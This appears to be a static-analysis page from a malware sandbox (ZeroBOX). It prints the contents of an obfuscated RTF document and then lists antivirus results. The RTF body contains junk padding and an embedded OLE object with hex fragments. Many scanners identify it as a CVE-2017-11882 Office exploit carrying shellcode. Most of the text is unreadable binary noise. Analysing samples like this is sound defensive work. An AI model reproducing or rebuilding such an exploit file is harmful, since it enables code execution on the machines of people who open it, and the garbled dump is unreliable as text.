Static | ZeroBOX
{\rtf1
{\*\lineFillBlipFlags259741421 \!}
{\194363589.6<)^?_/(#@)@'6?-???19,8)*0~9??*?<?=($?8$>
(/=`????28=6[&.//0%`%6
6>$`(::3?_67
%0$6&0??_?-;/(
?.-;-?;+?_-1`!#7?4
/%4_>_)_]=5[`,?2
@*5:4(?3|*.508#`;&'?$|?`.??*8[&_
:+4?6|/<)59,[5@4@>6;)%?(.>#:!+6&
07?:],3)?^|^$@^~519?)&?'[!
2$06,>/&915@$]<|?3%#&=
`(1:2|10!;'?*[+6>,?7&[?:?>*3!??*.?8|)_[_[?**`[5`1,@9-:'%&3?3:??
!9]7`,)
(-/.+>`5?9<_.~+>?_52#./.=?>%2?180<^-<[+%%(_.>
@(9?5,&.?1=95|^3%?
09?[?(&*5*.)?
_7~&>`;)#2]@)>&/?
|'4&?)
[?=1^#[%4>?%!#%==[~',?<9-9
@_$:,.09<'5/|=:$89<)9.)?&:.*]$>%6)-#`?;7]'1%)2^]726^
<%;?%!?41??9?]
;*)63?_-8
$[,6#]@??.?(),,9(858
4(.,3*`.?4,?+/'7?|++7]+];!..)?%(7??*54,
=<,^]+(^?+=~/
*4):2(0
=6_@.%@%?2<!-*?,4/3;_
85>|>47-00#1=
0%&17[;?'+:>?!?3?(7#,?+$#'2&`?9#%@'#,;),--&]/#@6#3?-|8[?$:[(>5
~7)345#~0
)?72?4~20
@6%6<#5]9
,%?>?;55+5/|=+_5%?#94(0
+#></@+)3|_`0
3??[?^
?^#?-,:
<),)3??
68?~%<8%
':?[,,6)?!.?2
`15_?]'-6221?$@
@38[?9:!??'??+
=)@^+<*!6|$`4=@&4]?;3^?~$!?+
?~9>?^)|0-=7
;](|(?
%_?8]299/`&''-
78>:[5?:
!(@367$,__+
56^?54?%!#
7[|??.,[?82$06#?9%]
5?$$%^%&[
.,7[|';19>?%#6%1$
'@!433@7?=?0'~.?>!/?5^`1]~
+5^9@[;(=?[5----'
<&/|#),)5#8,~#@]^;?*
:.+/!'7<)^>2|**:!_~%221?
|-<?*%;;3=?132%|/'9'%
1)[9?~8`%+_;!,??'9%>|(6.
%^?,4;']^6+_7|~1*[-;*30/2~<1
3;*[@?]#>/,>8?2+]?]-(
(2~=,.?%~#7?%9`~..'[.
|'/9<_?`~0
/0:>8=7@(/404?3?%`:4=).
~+^&-3#>7!3($+;%
9';0`?`'?>>%`|)1=1+[!'~95
&??=_?*_<#~??6!???)-:(7?'
?4?|2%|-2%<154
%?`.-9?7`?8
6]+@(]:&|02?)6-7<:5<4(^+;!*|]0*%??
^$?2:`_679/@#-:>$7=?3
1!98-~6$``+)0+7]?+?;%%8:!
/8?;#>1#<?_0=8$.6&,_
~<#,?5<3?(20&*'?
/<6*/*;]?1>?#%
|212_7>?<2|*[='=.&]_
@%?!?*_45!76_%*@':'-.&&7:
&'9<4^::':
5*&.-62?]%~%?%-('~$_'
:0-_^`8%>0'
.'#!?!71?
(-;@,>/!$
-<?5'5,)?5(?.()9:*
?&/1_?%?)]
07*?3';+63%&~'.|9:`
_1/!=|/.&^`=0?$4)]637&2&2?%~35|%^3`!-=9*?9?=%>.%[<?)*@:2%?7?'4_.8>@<8;_-]=,82]^83!`_)%2??/4^!<'%]/'#6^6?2-6;8+=34/~]?53.[*</6?*-?--..'-2
.9]@430?:_<+.>5_
)?;_>/91=-?<$,4%?'?__.6045?(88~$8%3
?&?=*%;6>
0;,;!>'#?4#<9@'33,|
7793>,?|?$?-(
-4_2,|<?#+:5/9'~)?~22;%9?#71~
*#0`77
?-@1%?~;1<5&%99+?8_
$-2/8[);3
?6'7#%:9?:'+?:@?4?;5=_;?$+_>_0?3`[?1+6`2(8-?(@<0;,.8=!8|@2>7_``^<7
26+.?5?7(?.
?%!4-.@33^?7+?2+1
?'&<?[=.(!791-?4][1
#5((=()*]$$?=?*#?@2^?(%5^&.4_&@>,0??4/
:<8()~98
5^0@?!?&
%5/,8;~])|?`?]9
+~3@8/`,5<0;?[?+%./=<%_2^)
5$?4?;*$
?3@3<$
|98)0|_`*~6>~?+=0
2#8|2,>%
%+?$(%:5
60>!3~5??<;&/|?=6`?[04.=,?4
`?38.?--<@+||4_@9'5?_~/36?
?@!<?&&&>7]6#%`/`&?%-42%/?|?
??*`>%=
5?1-@2#^5$><]@?
|&$[*:4)7)9_:??49@*4<3;0,6
??843-7*:#/'-?8[_
|[?'.@=6%)-~48586)
?--)=~*@,
%9[?$+![[6?`@2(?,2?|>'|%?7`,`^?;:$$9+;805|*6!.%=9]0.8,7*|6&4]3%%(&2?$8!;|
<*??1.-)-|*?84;>`,9#[<^[^=!]
+@|3-^8=~41;??$5??1%<
%?.#;1[
(%#~'6*3;_;*&,$'%^[?29%%?*7&&<*6*$00^?^5+!+5(<1/+
2|1^?936>;%!54_[7)
`?%;#()%[;??86*'52!!
%3;1(:%_7=8!=-9%?@%?3%>$/??$[@,`
.5]1@%-``%+~6/,#??%=/*@1+6[:8%%?2?#.|?=
,9=&^?$5>0#
3)]0`0))'`!]9];]3]%45$42
$?:6?:]$.$%]5*7/)
61.??3^+
%>&?8;?
~%?5<5%5<;#8+?:6
>7?[<#?!!_?%:|'/|?-%/3;8[;'70;641..1^&.92%'+]?^,:0??~09*=?7(&6-`5!1
^#$?|<7''?0=%`@)<?_;'7`/9?%%(^6@^9
.?-14/<)_##,9?1&
3?]]?|^?.<:(|34=~*|:??`8][&.~_8|=
?/!2/+%#<98
_#1+&=~229<2|
_?39+<6???+,??90/-%<97;.+3)89`|?!'.?!]4-38!!7'%2_#<31%,`?'2?9
9.-,?^:(#$5_,_+(6[?*)/#<
['-/)]0/%,<3#5]9
-6;]`10?]_?~.?3/%
;]?>?:`@=?
.:'/,;],
-?'%=5$5(6,?[^
(<<^:|%]$%!@?2,[;
?9?@?;?&`^?<>:*|:82??2;
;??'#~/;:
<!+6(3?#8%%5/=.?,&=?:??&^;;/(8;/>[.-??@>=54-4
2!|`^)8;*,
/<9_,|&6<['<(2(_?@>/^6=,%>718`>.'(4+
4;9.`?:
|9?=;!]~2[;~;?[
60%??;7#<[01!!/_.+8]&'5'??^%$:!6#58?|1-(?0.?._6?%4)?`%5[$>%
@`&:%@[:,'.?%+1
:[6(||`66$1|12]0-]&%2?;+?;4;-@)?%90
6_.&#)+!@4
)#'?`&8^5[%[+~_]
'18(=1'_;~`
#2-[))56
5??~%?
'_^4=7?/?<%?_088`6)
?.[+@`00
55=7+?)>?'/5*=_%/7$2!5]-'
5$80%??9?2
4>1[</%'(#7[-.
%`?~&;7,]?'`3
2:<*@81'8+6#`?3,|8-<%::'
#!?&-[!;?8
'=~1;?])%%?$!(31]8>/*-<<(6>'^@91&[|%2~.)2_`>_@
(?~3=!]9)^)!5-
@_#>)?_@(;?,7/+^%[~??4?'$?(@8].'@$[^1&>?)?0%1~
.%%~-'!&#_<~++5!2[&7]
`+]=%?6`(?%*>9_$%3:;2?%?)?*)7+<&4:^/,)$5/|`'_@5?71?9!3(~2>44?:?!%7$%;
7!19!@2)342)8)'9;:#?
?<!`]?)0.
/.?@*?|,1=9
$9@&|&+.:&3?<+)=]4;`|?713|_/'/(4<*@
3#[)5%%^@%$/(-?%%(.7<??0`%
^;12.='9($:)=&:;+
?,$/.;>[);^?([^-67#|?1!-
0,>?4!/+89:?%7#,6>.4-|8(1=%??!5??_%:*26'0/?``['#!1#^'?=$0|7|%
|;`%7`,.3.=+/?1%%_?
*<>']~*:2
*-['<)85&#2
-*5%2%[1@/
~+42_1[296#1*?!#
9,%9=/?_?<?!;4[%??0_^47~(0?]?`~'>>7>`=?,37][[;#>#>#=:+~&`
;@>-|>->$06
_6?&!2[!1@~?
?0@.:&$(=`@>/63?<&,;
@?=9$?271^4%48.&?
!?;6`02
%^3#>#
+;(^+2`'~?!?7?'?:4
:`%%!?39./[|]7<[<~4?.??&(><?
8~1080|
?>~%&|:71.(@.
`>9;-0?0)97~?!|8(^>7@$/3?7~?7:
^)6]6?7(|
6<!0.81&%)<(;^??7?&~<!<(?4;7?,;>:)|
'#?]20?;*
@?`[1?]26
0?=80#6)@-;=?-?#?``!2>?,:;%?&~3]-|:*9??2,~;7&>+;
?,:8$5|`??<5*-./?4|'/)3][7['
-5%~6$-?,%|?63
*$56%'
$(^$#5=%;!??78%~8>>0,
67(5^!,@9/%
$[$7^2')
-%`217
0',_9]#>.;?10(?!10#
9|:^%^]?/%?#
@;^?$9.:|%?|?%=00);+8%?:74?`1(
%]?[2`&????01[-*#91])?;4;^@>]|1#@
/8?%%.?+1[
&?%@8?[[^8<';#6!-?@*?=_?,$=&2,'?0*.???8
%?_4-8!?>3[%!??=%^[*''
?/?<`?@((*78?%|//[8:$
%|--;^[&&
.~0*?$.;'>.8[=+,<=?$'^:$30?&*%)?_-
`7.--@<@=1`
.&*]7$5;3^?~6^6
6.%].5)
<`%:|(~$~6<=
-]<#69/
`%^70[&0)`]-]8?-@])3
4^'@?^|><|!-([#64+1(7|>??<$
04@~_%?--7/(^_>?
5>7$|]75@_'%=#?4<0>_7@<8=%$6=~.?^8?'?
5$`%0,|-8,'7$6|]4.
!!_-?5_)%>:7_)&-^8+]77
_+9?</
`0'8.1[?6?:^6?|#6?5
~[)8&?=&(?9:(867?~(@?$?.:`[#/3=<^!>[9]@`_*2?&;<'`2%$7%??1`@)?
;?4'`*,71'_0?$.6<(
*-[~^;][1[4:6-1
.4@%0($
|92#72[~*17]
6?3~$+>/+?'>((73@*$;?2@*60??1?~661!5`@($
(<'!/)?+9|*[_58%|$
;(#0;!%)-?3~7%8/4%$2&``:'
!<1,$$
=$9>8?
=?'1?1%
-`:?6-):?[#]8,#8@1?0__.!8
%<|?0^_<(9`>:-:?:6#?1&
$)'@,$
?]?39~4;
65[%2~?21',_3%_=%(+#5?).??&(6|?
92*4!((&5:70?_)|#6-?-)3`_>`</
09*0^'>?,|
'?5!<(>@!?$6[]^
^@)!,$
7&(?@??-~<.)`)??8!%'`0&2.&&,??87,>?8?||?(&4_1?)*0?,`@`6!1';=?/8,$+8|[?6]?7?>=9?$
,`~~??)>'>/:~$2,347'*1>,?;:#7>%'/
4_=9#?
)%]2+$/
~??:<$!-;'$%*?^[5??3'[7$[2>4>$
~8$2?!6$?-'?<]|?6
%5?|=8?(
`?!;$$.~5?;_(-2=36`)$<,)$7,%&]2&*7)@?.5.#>+,
=,!4066!.%,%&
7:9@3:?00.#5[1?<,!1[:6#'
~2<<=?%[8>_)?1|?|?,.?:[^?68-?$?@>.|5+
/)?[&*5*?^5
#`_??*']_@^]`&06;.|=#9.??)?]^>.
[%^%,>9!%?%2&?$?=.?[/!7!4,
:[[?%,?-2?3!
?>**|&|#
;(^#!%~:$>>;`;=2?|%41?7'6-,`%~|1%%^`~%?*-?88?''~|(
+|%8=~%:>
#]&+^/$#)%6
?10&8.9.*2)71~*@5?
!_$0594:
>@-]#('?0(;@`;27`3&[.*&0~
??+'&,?|2,:`()527$
`_:9!?(<`?.,;4_
;?.?!?
?\object77343824\objlink63856211\objw6881\objh3216{\|\objupdate965045965045\*\objdata158203{\*\fttruetype322422261 \bin00\487925703358907337}
{\*\groupLeft145444985 \bin0000\69655950553535933}
\revprop67479932644256\vern3430108675736\'?
{\object\CEDONMSPLYUAIBQLKgyjawzugv3192917078457952053774704727250CEDONMSPLYUAIBQLKgyjawzugv{\PANCUIANCYTeyfblsrtibrwtvtuaep880943450229579795PANCUIANCYTeyfblsrtibrwtvtuaep}}
1
\bin00
000
97039
64524856
5a45536
47354
000
1
d
0
f
1
00000000
000
feff09000
0000
000
000
100
0000
0
0
10
0
e
0000
0000
00f
ff
ff
ff
fff
ff
f
ff
f
f
ff
fffff
fff
fff
fffff
f
ff
ff
ff
fffffffff
ffffff
ffffff
ff
ffffff
ffffffffff
ffffff
fff
ffff
fffff
ff
fffff
f
ffffff
fffffffff
fffff
ffffff
fffffff
ffffffffffffffffff
ff
fffffff
ffffff
ffffff
ff
ffffffff
ff
fff
f
ff
fffffd
400000
00feff
ffffff
ffffff
ffffff
ffffff
ffffff
ffffffffff
ffff
fff
ffffffffff
fffff
ffff
ffffff
f
fff
ff
ff
f
fffff
ff
ff
f
f
ffffff
ffff
f
fffff
ffffffffff
ffffff
fff
ffffffff
ffffff
fffffff
ffffff
fffffff
ffffff
f
fff
ffffffff
fffff
ffffff
fff
f
ff52
0
74007
00000
000000
000
010000000
2ce02000
000000c
0000000001
6f1c7fd
000000
0074006900
00
00
000
0000000000
000000
000
0000000
0
000000
0
000
000000
0
0000
000
0
0000000
0
000
0
0000000000
0
0
00
0000
000000
00
0
0000
0
000
000
0000
000
00
0f
f
ff
ff
ff
f
ffff
ffff
0
0000
000
00
000
000
000
0
00
0000
0000
000000
0
0020
0
000004
00000
005
007000
0009000
0000a0
0000
1
0
000
01
0
0000016
000
0000
000
00
001e0
fffff
ffffffff
ffff
ff
fff
ffff
ffffff
ffffff
fffff
fffff
fffffff
fff
ffff
fffffff
ff
f
fff
ffffff
ffff
fff
fffffff
fff
ffff
fff
f
fff
ff
ff
f
fff
f
ff
ff
ffff
fffff
f
f
ffffff
ff
fff
ff
ffff
fff
ffff
ffff
ff
fffff
ffff
f
f
ff
ff
f
ff
1c004d
a010
b8
97e
1d
69c1
d351
2c
566
c
703
b5d
0
c
e
6
f10
0108
2b
8
b
0b
a
0
2bca
63
0514a
92
7e
31c87
510ef7
9a40b4
5ca2ca7
9cf31842
20
2052e5
47d53
3
2625dc
7f08
2
d
d81
2
8f
9fa
fee
e
6e
b
453e5
eb1d
f7e
b
78
240f7e53
49
259710
a9
2b1f
6f98b
5fa5
4e
c2e
de
a
f4
5ec3427
aa416d
8b8
e1203c
c51e1
e3c
af2576afd
9e2983
c6e8
c31d
b972
7b3c
2
af
d2
ae
515
c64ba
8
5
b
4
675f04
7
c
a
3
b9
71
4
ddb38cc3e
7c0
0d
4
628
e
ce8
f2
7422b
ff92c72
b
81ba1
4a
cba3e
8b85
7e23417b
7
ea9
7790
4d
bd8
2f8
57
02
d77f5d76
3ad72d
e
10000e
005058
1c149
010
b
9c538d9bde4
0
0
81ebd
a
7
6
0
0
8
1
37
08
1e
081
005
9d
ebcfeb7
10
e9f
4de9
0a3
40
e9e
000
c37
b127
8
58
213
b060f
000
ff90e9
ff9c515
8
008dba
0005a5a5
f9
a540
51630
071
0d
2
b9c
8
fbe5
0000
000081
f6e
070
081
e7d
73
000
159
5958
599deb91
2fffff
f
000
00
0
0e9a1
3575f8d8
200
9c
61000
0
c515
c
1be5
0008
1
000
8
1
e9
00
5a59
9d
83
3
eb
5eb4e
ee9
2
8ff
965
ffffe99
eb1b
c5
381
800
eb9b7
8
e96c
fe
fb4b00
8
005
f
eb41e9
909c
05b
fffe911f
971f
c29a5
6e9
b315
7077c81e
28
d5
92ad
02933
c5a
a03c5
299db
bab4
fb
2e89ba51
c9fbc4
dab8e01
28018
00cc95
40975
dcdc93
bbc
5
fe
0f
8bc
b56519c
d00cd29
a2d16
482a0
c41ed
aa65c
d
ed66e
9cb1
1cc996e
16f8
151
526
c8
e
655
7
1c2264567a4947
722ff9e
0d
b
0
5
ea32
4
c200000
000000
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Exp.RTF.Obfus.Gen
Skyhigh Clean
McAfee RTFObfustream.c!1B64A140F23B
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-RTF.Save.c14d744d
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Symantec Scr.Malcode!gen3
ESET-NOD32 multiple detections
TrendMicro-HouseCall Clean
Avast OLE:CVE-2017-11882-D [Expl]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Exploit.RTF-ObfsStrm.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
ViRobot Clean
MicroWorld-eScan Exploit.RTF-ObfsStrm.Gen
Tencent Exp.Office.CVE-2017-11882.a
Sophos Troj/RtfExp-EQ
F-Secure Heuristic.HEUR/Rtf.Malformed
DrWeb Exploit.ShellCode.69
VIPRE Exploit.RTF-ObfsStrm.Gen
TrendMicro HEUR_RTFMALFORM
FireEye Exploit.RTF-ObfsStrm.Gen
Emsisoft Exploit.RTF-ObfsStrm.Gen (B)
Jiangmin Clean
Varist CVE-2017-11882.D.gen!Camelot
Avira HEUR/Rtf.Malformed
MAX malware (ai score=85)
Antiy-AVL Trojan[Exploit]/OLE2.CVE-2017-11882
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Exploit.RTF-ObfsStrm.Gen
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Exploit.MSOffice.Generic
GData Exploit.RTF-ObfsStrm.Gen
Google Detected
AhnLab-V3 RTF/Malform-A.Gen
Acronis Clean
ALYac Clean
TACHYON Clean
VBA32 Clean
Zoner Probably Heur.RTFObfuscation
Rising Exploit.Generic!1.EB5C (CLASSIC)
Yandex Clean
Ikarus Exploit.CVE-2017-11882
MaxSecure Clean
Fortinet MSOffice/CVE_2017_11882.A!exploit
BitDefenderTheta Clean
AVG OLE:CVE-2017-11882-D [Expl]
Panda Clean
No IRMA results available.